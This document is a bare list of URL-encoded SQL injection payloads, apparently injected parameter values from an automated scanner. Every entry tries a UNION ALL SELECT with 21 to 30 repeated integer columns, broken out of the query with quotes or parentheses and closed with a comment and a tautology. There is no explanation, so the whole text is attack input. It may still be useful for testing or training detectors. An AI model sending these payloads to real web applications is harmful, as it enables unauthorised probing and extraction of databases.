-6821%22%29%29%29%20UNION%20ALL%20SELECT%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%2C%207746%23%20AND%20%28%28%28%22qpVR%22%3D%22qpVR -2451%22%29%29%29%20UNION%20ALL%20SELECT%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%23%20AND%20%28%28%28%22vVzf%22%3D%22vVzf -7473%22%29%29%29%20UNION%20ALL%20SELECT%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%2C%205336%23%20AND%20%28%28%28%22BowA%22%3D%22BowA -3875%22%29%29%29%20UNION%20ALL%20SELECT%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%2C%201584%23%20AND%20%28%28%28%22TvwZ%22%3D%22TvwZ -6368%22%29%29%29%20UNION%20ALL%20SELECT%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%23%20AND%20%28%28%28%22kmQR%22%3D%22kmQR -2327%22%29%29%29%20UNION%20ALL%20SELECT%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%23%20AND%20%28%28%28%22mHlK%22%3D%22mHlK -8415%22%20UNION%20ALL%20SELECT%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%2C%201909%23%20AND%20%22iJPI%22%3D%22iJPI -4708%22%20UNION%20ALL%20SELECT%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%2C%207982%23%20AND%20%22zgqt%22%3D%22zgqt -8812%22%20UNION%20ALL%20SELECT%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%23%20AND%20%22AuvK%22%3D%22AuvK -9972%22%20UNION%20ALL%20SELECT%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%2C%202087%23%20AND%20%22pYeR%22%3D%22pYeR -6488%22%20UNION%20ALL%20SELECT%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%23%20AND%20%22fspd%22%3D%22fspd -4129%22%20UNION%20ALL%20SELECT%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%2C%203203%23%20AND%20%22UyaS%22%3D%22UyaS -8094%22%20UNION%20ALL%20SELECT%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%2C%207406%23%20AND%20%22VgbY%22%3D%22VgbY -4972%22%20UNION%20ALL%20SELECT%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%2C%202417%23%20AND%20%22dFBj%22%3D%22dFBj -6095%22%20UNION%20ALL%20SELECT%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%2C%205269%23%20AND%20%22jlIG%22%3D%22jlIG -5602%22%20UNION%20ALL%20SELECT%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%23%20AND%20%22FBUR%22%3D%22FBUR -4441%22%29%20UNION%20ALL%20SELECT%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%23%20AND%20%28%22ZPvC%22%20LIKE%20%22ZPvC -3062%22%29%20UNION%20ALL%20SELECT%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%2C%208683%23%20AND%20%28%22hPDa%22%20LIKE%20%22hPDa -9661%22%29%20UNION%20ALL%20SELECT%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%2C%201556%23%20AND%20%28%22SocN%22%20LIKE%20%22SocN -9406%22%29%20UNION%20ALL%20SELECT%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%23%20AND%20%28%22NXgq%22%20LIKE%20%22NXgq -8653%22%29%20UNION%20ALL%20SELECT%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%2C%206593%23%20AND%20%28%22kgxu%22%20LIKE%20%22kgxu -1726%22%29%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%23%20AND%20%28%22aXFC%22%20LIKE%20%22aXFC -6278%22%29%20UNION%20ALL%20SELECT%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%23%20AND%20%28%22NZUo%22%20LIKE%20%22NZUo -6319%22%29%20UNION%20ALL%20SELECT%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%2C%207450%23%20AND%20%28%22pniw%22%20LIKE%20%22pniw -7377%22%29%20UNION%20ALL%20SELECT%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%2C%204602%23%20AND%20%28%22LFNk%22%20LIKE%20%22LFNk -5869%22%29%20UNION%20ALL%20SELECT%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%23%20AND%20%28%22zHIm%22%20LIKE%20%22zHIm -1449%22%29%29%20UNION%20ALL%20SELECT%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%2C%206613%23%20AND%20%28%28%22nuZs%22%20LIKE%20%22nuZs -8940%22%29%29%20UNION%20ALL%20SELECT%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%2C%201359%23%20AND%20%28%28%22WJRV%22%20LIKE%20%22WJRV -3768%22%29%29%20UNION%20ALL%20SELECT%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%2C%209773%23%20AND%20%28%28%22AbJB%22%20LIKE%20%22AbJB -7366%22%29%29%20UNION%20ALL%20SELECT%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%23%20AND%20%28%28%22zUir%22%20LIKE%20%22zUir -6765%22%29%29%20UNION%20ALL%20SELECT%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%2C%207727%23%20AND%20%28%28%22Szkt%22%20LIKE%20%22Szkt -5298%22%29%29%20UNION%20ALL%20SELECT%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%23%20AND%20%28%28%22MrnS%22%20LIKE%20%22MrnS -3648%22%29%29%20UNION%20ALL%20SELECT%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%2C%206192%23%20AND%20%28%28%22Bikn%22%20LIKE%20%22Bikn -6172%22%29%29%20UNION%20ALL%20SELECT%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%2C%209437%23%20AND%20%28%28%22gIVC%22%20LIKE%20%22gIVC -8608%22%29%29%20UNION%20ALL%20SELECT%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%23%20AND%20%28%28%22EKTL%22%20LIKE%20%22EKTL -7292%22%29%29%20UNION%20ALL%20SELECT%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%23%20AND%20%28%28%22TqpK%22%20LIKE%20%22TqpK -3825%22%29%29%29%20UNION%20ALL%20SELECT%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%2C%203305%23%20AND%20%28%28%28%22Hahs%22%20LIKE%20%22Hahs -6152%22%29%29%29%20UNION%20ALL%20SELECT%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%2C%208847%23%20AND%20%28%28%28%22jLny%22%20LIKE%20%22jLny -7363%22%29%29%29%20UNION%20ALL%20SELECT%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%23%20AND%20%28%28%28%22sejW%22%20LIKE%20%22sejW -1768%22%29%29%29%20UNION%20ALL%20SELECT%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%2C%205433%23%20AND%20%28%28%28%22gAkM%22%20LIKE%20%22gAkM -4255%22%29%29%29%20UNION%20ALL%20SELECT%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%2C%202888%23%20AND%20%28%28%28%22hpQI%22%20LIKE%20%22hpQI -4110%22%29%29%29%20UNION%20ALL%20SELECT%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%2C%206709%23%20AND%20%28%28%28%22wFCp%22%20LIKE%20%22wFCp -5588%22%29%29%29%20UNION%20ALL%20SELECT%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%2C%205225%23%20AND%20%28%28%28%22LWvF%22%20LIKE%20%22LWvF -7783%22%29%29%29%20UNION%20ALL%20SELECT%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%2C%201679%23%20AND%20%28%28%28%22MdVm%22%20LIKE%20%22MdVm -9111%22%29%29%29%20UNION%20ALL%20SELECT%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%2C%204197%23%20AND%20%28%28%28%22VVsD%22%20LIKE%20%22VVsD -6587%22%29%29%29%20UNION%20ALL%20SELECT%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%23%20AND%20%28%28%28%22yHhE%22%20LIKE%20%22yHhE -3224%22%20UNION%20ALL%20SELECT%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%2C%203449%23%20AND%20%22FDMU%22%20LIKE%20%22FDMU -6788%22%20UNION%20ALL%20SELECT%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%2C%208536%23%20AND%20%22RiaN%22%20LIKE%20%22RiaN -1285%22%20UNION%20ALL%20SELECT%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%2C%208875%23%20AND%20%22lcfn%22%20LIKE%20%22lcfn -8188%22%20UNION%20ALL%20SELECT%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%23%20AND%20%22OEdW%22%20LIKE%20%22OEdW -4847%22%20UNION%20ALL%20SELECT%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%23%20AND%20%22pgDW%22%20LIKE%20%22pgDW -4001%22%20UNION%20ALL%20SELECT%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%2C%205415%23%20AND%20%22zSiX%22%20LIKE%20%22zSiX -2939%22%20UNION%20ALL%20SELECT%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%2C%203327%23%20AND%20%22CVLJ%22%20LIKE%20%22CVLJ -2624%22%20UNION%20ALL%20SELECT%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%23%20AND%20%22FmEu%22%20LIKE%20%22FmEu -1413%22%20UNION%20ALL%20SELECT%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%2C%205828%23%20AND%20%22FYsx%22%20LIKE%20%22FYsx -6956%22%20UNION%20ALL%20SELECT%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%23%20AND%20%22bKmY%22%20LIKE%20%22bKmY -9534%29%20WHERE%208661%3D8661%20UNION%20ALL%20SELECT%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%2C%208661%23 -8548%29%20WHERE%202763%3D2763%20UNION%20ALL%20SELECT%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%2C%202763%23 -7677%29%20WHERE%206206%3D6206%20UNION%20ALL%20SELECT%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%23 -3487%29%20WHERE%204382%3D4382%20UNION%20ALL%20SELECT%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%2C%204382%23 -3554%29%20WHERE%205564%3D5564%20UNION%20ALL%20SELECT%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%2C%205564%23 -3294%29%20WHERE%203666%3D3666%20UNION%20ALL%20SELECT%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%2C%203666%23 -8236%29%20WHERE%205912%3D5912%20UNION%20ALL%20SELECT%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%2C%205912%23 -6519%29%20WHERE%209334%3D9334%20UNION%20ALL%20SELECT%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%2C%209334%23 -1506%29%20WHERE%207599%3D7599%20UNION%20ALL%20SELECT%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%2C%207599%23 -5042%29%20WHERE%206421%3D6421%20UNION%20ALL%20SELECT%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%2C%206421%23 -8932%27%29%20WHERE%206950%3D6950%20UNION%20ALL%20SELECT%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%23 -7127%27%29%20WHERE%209785%3D9785%20UNION%20ALL%20SELECT%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%2C%209785%23 -4791%27%29%20WHERE%207832%3D7832%20UNION%20ALL%20SELECT%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%2C%207832%23 -9585%27%29%20WHERE%204366%3D4366%20UNION%20ALL%20SELECT%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%23 -7031%27%29%20WHERE%206907%3D6907%20UNION%20ALL%20SELECT%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%2C%206907%23 -9346%27%29%20WHERE%204870%3D4870%20UNION%20ALL%20SELECT%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%23 -7253%27%29%20WHERE%206071%3D6071%20UNION%20ALL%20SELECT%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%2C%206071%23 -4516%27%29%20WHERE%208676%3D8676%20UNION%20ALL%20SELECT%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%23 